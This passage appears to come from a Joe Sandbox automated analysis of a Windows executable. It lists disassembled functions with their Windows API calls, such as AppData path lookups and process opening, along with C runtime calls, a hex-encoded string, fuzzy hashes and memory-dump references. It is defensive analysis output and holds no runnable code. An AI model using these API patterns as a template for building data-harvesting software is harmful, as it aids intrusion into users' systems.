                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 728223a93955a3e65dba8dd33622e377afacf7a841f8237ec4a970af6aa10be2
                        • Instruction ID: 1092e63517ca28004251d510a11f0a78216ca33ab2f3e43639c2bb7a5be1b44f
                        • Opcode Fuzzy Hash: 728223a93955a3e65dba8dd33622e377afacf7a841f8237ec4a970af6aa10be2
                        • Instruction Fuzzy Hash: 32F0F033B000260F8304743D8D851AFA88766E139033AC72AEA0AEF399DC34EC8285D8
                        Function 005186D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0051781C: __mtinitlocknum.LIBCMT ref: 00517832
                          • Part of subcall function 0051781C: __amsg_exit.LIBCMT ref: 0051783E
                        • ___addlocaleref.LIBCMT ref: 00518756
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                        • String ID: KERNEL32.DLL$XuR$xtR
                        • API String ID: 3105635775-2045896750
                        • Opcode ID: 57ed8a800c3efcfb5f0147b2cbac3a978e04f6f3926c81c4b6519ab469276020
                        • Instruction ID: 8c0172e976cee078effffb583bc67c6c9533c92abf5843d6bcadad348e3f914c
                        • Opcode Fuzzy Hash: 57ed8a800c3efcfb5f0147b2cbac3a978e04f6f3926c81c4b6519ab469276020
                        • Instruction Fuzzy Hash: 20016171585B05EAE720AF79984D78AFFE0BF95320F20890DE0D5572E1CBB4A584CB50
                        Function 0050E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                        Download Yara Rule
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050E544
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E573
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E581
                        • lstrcat.KERNEL32(?,0103D148), ref: 0050E59C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: cb3c3369ce74c024f62f625e411d73770b0a6217be2e7d01d23dffcd86e014ba
                        • Instruction ID: 6b7579c839ca3ae068fe88a5e5d08be36d47bc49219c3f142dc3adde764b7f5d
                        • Opcode Fuzzy Hash: cb3c3369ce74c024f62f625e411d73770b0a6217be2e7d01d23dffcd86e014ba
                        • Instruction Fuzzy Hash: B351EAB5A1010CABDB64EB54DC43EFE377DFB48300F44449DBA0587281DE759E858BA5
                        Function 00511FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00511FDF, 00511FF5, 005120B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strlen
                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 39653677-4138519520
                        • Opcode ID: da75cb584d2cde1db556506dd999e5517b2d11ca9e0ceeb7c2a02807b866801f
                        • Instruction ID: d49595b0bc74a480b06a30eb5c69fcb8e7ce59aaa9c0779e9cec45686bbc0b69
                        • Opcode Fuzzy Hash: da75cb584d2cde1db556506dd999e5517b2d11ca9e0ceeb7c2a02807b866801f
                        • Instruction Fuzzy Hash: 15217C395101898FEB20EB36D44C7DDFB67FF88361F948656C8180B2C1E33219AAD796
                        Function 0050EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                        Download Yara Rule
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050EBB4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050EBE3
                        • lstrcat.KERNEL32(?,00000000), ref: 0050EBF1
                        • lstrcat.KERNEL32(?,0103E098), ref: 0050EC0C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 02d1d1d322f62b99a4072d0bf335c18f1c589b6f49097b4cd2aada6440ddd527
                        • Instruction ID: 9c8e94254a6290db221ba01f43ad50ed2f0310f2ef22cf2c1819770d4aca6ca4
                        • Opcode Fuzzy Hash: 02d1d1d322f62b99a4072d0bf335c18f1c589b6f49097b4cd2aada6440ddd527
                        • Instruction Fuzzy Hash: 2431B471E1011D9BCB21EB64DD42BFD77B4FF48300F1444A9BB0697280DE74AE858B98
                        Function 00514480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000), ref: 00514492
                        • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 005144AD
                        • CloseHandle.KERNEL32(00000000), ref: 005144B4
                        • lstrcpy.KERNEL32(00000000,?), ref: 005144E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                        • String ID:
                        • API String ID: 4028989146-0
                        • Opcode ID: 907ae56a716848e1e47ef047a057777f4c3f00976d4bed02376501d1a14136f2
                        • Instruction ID: d47f61e302941666c898f53d530a655815d0d22f5314777574fcbd7fe2c63682
                        • Opcode Fuzzy Hash: 907ae56a716848e1e47ef047a057777f4c3f00976d4bed02376501d1a14136f2
                        • Instruction Fuzzy Hash: 09F0FCF09016192BFB309B749D49BE67BA8BF14704F044591FB89D7180DBF88DC18B98
                        Function 00518FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 00518FDD
                          • Part of subcall function 005187FF: __amsg_exit.LIBCMT ref: 0051880F
                        • __getptd.LIBCMT ref: 00518FF4
                        • __amsg_exit.LIBCMT ref: 00519002
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00519026
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: ddafae0716dcdeadb7657d68095d5e02e2b52c5a6a3f48bdce08979f433f6004
                        • Instruction ID: 00d863ba3227ca78bb2209c1d52e98fe7097b371e66fea0bfdf609992e5ff03a
                        • Opcode Fuzzy Hash: ddafae0716dcdeadb7657d68095d5e02e2b52c5a6a3f48bdce08979f433f6004
                        • Instruction Fuzzy Hash: 61F06232A086159BF670FB7C580E7E92EA07F48720F244119F4446A1D2DF6459C1D655
                        Function 00517310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(------,004F5BEB), ref: 0051731B
                        • lstrcpy.KERNEL32(00000000), ref: 0051733F
                        • lstrcat.KERNEL32(?,------), ref: 00517349
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: ------
                        • API String ID: 3050337572-882505780
                        • Opcode ID: 5e0325f360d3789dae8008efc4b7b44ca221cf4f2c9d4a562a8c50f89656a2c5
                        • Instruction ID: 8863dd9d6a00e857b1af8a3243c5677bbb66fbefc00db69f114499755b9f486d
                        • Opcode Fuzzy Hash: 5e0325f360d3789dae8008efc4b7b44ca221cf4f2c9d4a562a8c50f89656a2c5
                        • Instruction Fuzzy Hash: EAF0C0745117069FEB649F39D94C927BBF9EF44701718881DA89AC7214E734D881CB14
                        Function 005033D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00503422
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050344B
                        • lstrcpy.KERNEL32(00000000,?), ref: 00503471
                        • lstrcpy.KERNEL32(00000000,?), ref: 00503497
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: fe4f37b00d2d5ffffcbf3531e5881008c68336e210976d4ccb7fdd2988990ea6
                        • Instruction ID: c40e1b507f596b547bed8045af1f96286980d4bad0d0d3709a523a98add85d27
                        • Opcode Fuzzy Hash: fe4f37b00d2d5ffffcbf3531e5881008c68336e210976d4ccb7fdd2988990ea6
                        • Instruction Fuzzy Hash: A212DB70A112059FDB28CF19C558B29BBE9BF44718B1DC0AEE8099B3E2D776DD42CB44
                        Function 00507C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507C94
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507CAF
                          • Part of subcall function 00507D40: std::_Xinvalid_argument.LIBCPMT ref: 00507D58
                          • Part of subcall function 00507D40: std::_Xinvalid_argument.LIBCPMT ref: 00507D76
                          • Part of subcall function 00507D40: std::_Xinvalid_argument.LIBCPMT ref: 00507D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: string too long
                        • API String ID: 909987262-2556327735
                        • Opcode ID: 1d48e15ee362f77db32d9c1f15ba6ffde0fc4a469d01ecceb3de2e3ebfa6e715
                        • Instruction ID: e15247a4757314e1f3aa04dd99d18a6d6c76f7f8467ffa64d8aa6c6cd0affbb8
                        • Opcode Fuzzy Hash: 1d48e15ee362f77db32d9c1f15ba6ffde0fc4a469d01ecceb3de2e3ebfa6e715
